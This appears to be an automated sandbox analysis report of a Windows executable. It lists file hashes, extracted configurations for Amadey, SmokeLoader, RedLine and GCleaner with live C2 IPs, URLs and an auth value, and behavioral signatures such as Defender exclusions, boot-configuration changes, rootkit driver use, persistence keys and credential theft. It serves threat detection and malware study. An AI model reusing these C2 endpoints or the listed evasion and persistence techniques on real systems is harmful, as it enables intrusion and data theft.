Analysis
-
max time kernel
293s -
max time network
304s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
01/07/2023, 23:40
Static task
static1
Behavioral task
behavioral1
Sample
2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe
Resource
win10-20230621-en
General
-
Target
2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe
-
Size
4.2MB
-
MD5
ea191512e6ed56aa661ecb2deed1623e
-
SHA1
a2198ccd7d00ab727618ca2368f9f8c54b01c5d3
-
SHA256
2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7
-
SHA512
7658e27038f60aa13df49bf48ac90a13cf77ef7e88e16453964b44e1cf9669ad3d06884692288a67a1dd3ffee89ce35e55750227e913bd3193dcc666f8bb8419
-
SSDEEP
98304:sHejdaMKBnK2t4x+GwYIb4jYfCmAcZmPcxkk9cRj5MQL:sHGdaTBnK2tHG2UMdWGLcRWE
Malware Config
Extracted
amadey
3.83
5.42.65.80/8bmeVwqx/index.php
Extracted
gcleaner
45.12.253.56
45.12.253.72
45.12.253.98
45.12.253.75
Extracted
smokeloader
up3
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
Extracted
redline
280623_rc_11
rcn.tuktuk.ug:11285
-
auth_value
7dbd026b7e6c26ab5e41958efd6a2a6e
Signatures
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral1/memory/1068-163-0x0000000002F40000-0x0000000003071000-memory.dmp family_fabookie behavioral1/memory/1068-273-0x0000000002F40000-0x0000000003071000-memory.dmp family_fabookie -
Glupteba payload 1 IoCs
resource yara_rule behavioral1/memory/1248-361-0x0000000002C20000-0x000000000350B000-memory.dmp family_glupteba -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 33 IoCs
description pid Process procid_target PID 680 created 1280 680 XandETC.exe 8 PID 680 created 1280 680 XandETC.exe 8 PID 680 created 1280 680 XandETC.exe 8 PID 680 created 1280 680 XandETC.exe 8 PID 680 created 1280 680 XandETC.exe 8 PID 924 created 1280 924 updChrome.exe 8 PID 924 created 1280 924 updChrome.exe 8 PID 924 created 1280 924 updChrome.exe 8 PID 924 created 1280 924 updChrome.exe 8 PID 924 created 1280 924 updChrome.exe 8 PID 2040 created 1280 2040 updChrome.exe 8 PID 2040 created 1280 2040 updChrome.exe 8 PID 2040 created 1280 2040 updChrome.exe 8 PID 2040 created 1280 2040 updChrome.exe 8 PID 2040 created 1280 2040 updChrome.exe 8 PID 1312 created 1280 1312 updChrome.exe 8 PID 1312 created 1280 1312 updChrome.exe 8 PID 1312 created 1280 1312 updChrome.exe 8 PID 1312 created 1280 1312 updChrome.exe 8 PID 1312 created 1280 1312 updChrome.exe 8 PID 2284 created 1280 2284 updater.exe 8 PID 2284 created 1280 2284 updater.exe 8 PID 2284 created 1280 2284 updater.exe 8 PID 2284 created 1280 2284 updater.exe 8 PID 2284 created 1280 2284 updater.exe 8 PID 2888 created 1280 2888 conhost.exe 8 PID 288 created 1280 288 updater.exe 8 PID 288 created 1280 288 updater.exe 8 PID 288 created 1280 288 updater.exe 8 PID 288 created 1280 288 updater.exe 8 PID 288 created 1280 288 updater.exe 8 PID 2284 created 1280 2284 updater.exe 8 PID 288 created 1280 288 updater.exe 8 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 3eef203fb515bda85f514e168abb5973.exe -
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 2104 bcdedit.exe 2092 bcdedit.exe 2836 bcdedit.exe 2844 bcdedit.exe 2864 bcdedit.exe 2928 bcdedit.exe 2640 bcdedit.exe 2652 bcdedit.exe 2584 bcdedit.exe 3052 bcdedit.exe 2256 bcdedit.exe 2760 bcdedit.exe 1720 bcdedit.exe 1248 bcdedit.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts updChrome.exe File created C:\Windows\System32\drivers\etc\hosts updChrome.exe File created C:\Windows\System32\drivers\etc\hosts updChrome.exe File created C:\Windows\system32\drivers\Winmon.sys csrss.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2200 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 29 IoCs
pid Process 1068 aafg31.exe 1464 oldplayer.exe 680 XandETC.exe 1136 oneetx.exe 1704 oneetx.exe 1884 setup.exe 856 updEdge.exe 924 updChrome.exe 1596 toolspub2.exe 1704 toolspub2.exe 1416 updEdge.exe 2040 updChrome.exe 1248 3eef203fb515bda85f514e168abb5973.exe 480 updEdge.exe 1312 updChrome.exe 1580 3eef203fb515bda85f514e168abb5973.exe 2332 csrss.exe 2168 patch.exe 2560 injector.exe 2284 updater.exe 288 updater.exe 2216 oneetx.exe 844 dsefix.exe 2440 windefender.exe 2312 windefender.exe 2028 oneetx.exe 1700 f801950a962ddba14caaa44bf084b55c.exe 2652 oneetx.exe 2116 oneetx.exe -
Loads dropped DLL 36 IoCs
pid Process 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 1708 2b30c78da77cb01371ef3e1fe61d70608227a5c1784ffe4366cb77461d4323e7.exe 1464 oldplayer.exe 1136 oneetx.exe 1884 setup.exe 1884 setup.exe 1884 setup.exe 1136 oneetx.exe 1136 oneetx.exe 1136 oneetx.exe 1136 oneetx.exe 1596 toolspub2.exe 1136 oneetx.exe 1136 oneetx.exe 1136 oneetx.exe 1136 oneetx.exe 1136 oneetx.exe 1136 oneetx.exe 1580 3eef203fb515bda85f514e168abb5973.exe 1580 3eef203fb515bda85f514e168abb5973.exe 832 Process not Found 2168 patch.exe 2168 patch.exe 2168 patch.exe 2168 patch.exe 2168 patch.exe 2352 taskeng.exe 2332 csrss.exe 2352 taskeng.exe 2168 patch.exe 2168 patch.exe 2168 patch.exe 2332 csrss.exe 2332 csrss.exe 2332 csrss.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/2440-676-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2312-677-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/files/0x000a000000015ce9-760.dat upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3eef203fb515bda85f514e168abb5973.exe = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 3eef203fb515bda85f514e168abb5973.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 3eef203fb515bda85f514e168abb5973.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-1306246566-3334493410-3785284834-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 3eef203fb515bda85f514e168abb5973.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
description ioc Process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 1596 set thread context of 1704 1596 toolspub2.exe 56 PID 856 set thread context of 916 856 updEdge.exe 60 PID 1416 set thread context of 1564 1416 updEdge.exe 68 PID 480 set thread context of 2808 480 updEdge.exe 85 PID 2284 set thread context of 2888 2284 updater.exe 236 PID 288 set thread context of 2608 288 updater.exe 260 PID 2284 set thread context of 1416 2284 updater.exe 261 PID 288 set thread context of 2244 288 updater.exe 262 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 3eef203fb515bda85f514e168abb5973.exe -
Drops file in Program Files directory 8 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe updChrome.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Chrome\updater.exe updChrome.exe File created C:\Program Files\Google\Chrome\updater.exe updChrome.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss 3eef203fb515bda85f514e168abb5973.exe File created C:\Windows\rss\csrss.exe 3eef203fb515bda85f514e168abb5973.exe File created C:\Windows\Logs\CBS\CbsPersist_20230701234124.cab makecab.exe -
Launches sc.exe 31 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2648 sc.exe 3064 sc.exe 900 sc.exe 2952 sc.exe 2428 sc.exe 2868 sc.exe 2084 sc.exe 3044 sc.exe 572 sc.exe 2420 sc.exe 2644 sc.exe 2324 sc.exe 2072 sc.exe 2984 sc.exe 2372 sc.exe 1780 sc.exe 3000 sc.exe 3012 sc.exe 2440 sc.exe 2644 sc.exe 2940 sc.exe 2908 sc.exe 2920 sc.exe 2328 sc.exe 680 sc.exe 2908 sc.exe 2944 sc.exe 2392 sc.exe 2960 sc.exe 2148 sc.exe 1564 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspub2.exe -
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 696 schtasks.exe 2328 schtasks.exe 2780 schtasks.exe 2460 schtasks.exe 2932 schtasks.exe 2172 schtasks.exe 2068 schtasks.exe 2712 schtasks.exe 1184 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2796 WMIC.exe -
Kills process with taskkill 1 IoCs
pid Process 2016 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-92 = "Pacific SA Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-22 = "Cape Verde Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" windefender.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" 3eef203fb515bda85f514e168abb5973.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-521 = "N. Central Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" 3eef203fb515bda85f514e168abb5973.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" windefender.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726